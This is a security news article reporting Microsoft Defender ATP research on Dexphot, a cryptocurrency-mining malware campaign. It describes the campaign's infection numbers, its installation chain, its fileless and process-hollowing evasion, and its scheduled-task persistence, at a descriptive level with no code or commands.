The Microsoft Defender ATP research team has warned of a new cryptocurrency-stealing malware variant that uses a variety of sophisticated methods to evade security solutions.
The researchers have been tracking the new threat, dubbed Dexphot, since the start of the campaign in October 2018. The malware had a spike in mid-June this year, when it infected nearly 80,000 computers hijacking their resources to mine cryptocurrency and generate revenue for its operators, but towards the end of the month its activity slowed down, with the infection rates reaching less than 20,000 computers. By the end of July, the number of compromised machines decreased to 10,000 computers.
What makes Dexphot stand out, is its use of sophisticated methods designed to conceal its activities from security software.
“Layers of obfuscation, encryption, and the use of randomized file names hid the installation process. Dexphot then used fileless techniques to run malicious code directly in memory, leaving only a few traces that can be used for forensics. It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot ultimately ran a cryptocurrency miner on the device, with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware,” the report says.
Some of the files deployed by Dexphot would change every 20 or 30 minutes, making it difficult to track its activity. According to Microsoft, during the early stages of infection Dexphot leverages numerous files and processes. During the execution stage, Dexphot writes the following key files to disk:
An installer with two URLs
An MSI package file downloaded from one of the URLs
A password-protected ZIP archive
A loader DLL, which is extracted from the archive
An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing
Dexphot is a so-called a second-stage payload, a type of malware that is deployed on already infected computers. In observed attacks, the Dexphot miner was dropped on computers that were previously infected with ICLoader, a family of bundlers that are focused on installing adware on the affected Windows systems. The researchers noticed that the installer uses two URLs to download malicious payloads, the same two URLs are used by Dexphot to establish persistence, update the malware, and re-infect the device. The installer downloads an MSI package from one of the above URLs, then it executes the msiexec.exe to silently install the malware. The malware also employs living-off-the-land techniques to execute its code using legitimate system processes.
Dexphot’s package contains an obfuscated batch script that is checking for antivirus products and if such software is found running on the machine the malware halts the infection process immediately. The researchers said that at the beginning of their investigation the script checked for antivirus products from Avast and AVG, later Windows Defender Antivirus was added to the checklist.
The malware also uses scheduled tasks to achieve persistence. That also allows Dexphot to update the payload from the web every time the tasks run. All components are refreshed this way each time the system is rebooted and every 90 or 110 minutes while the machine is running.
“Dexphot is not the type of attack that generates mainstream media attention; it’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit,” the researchers concluded.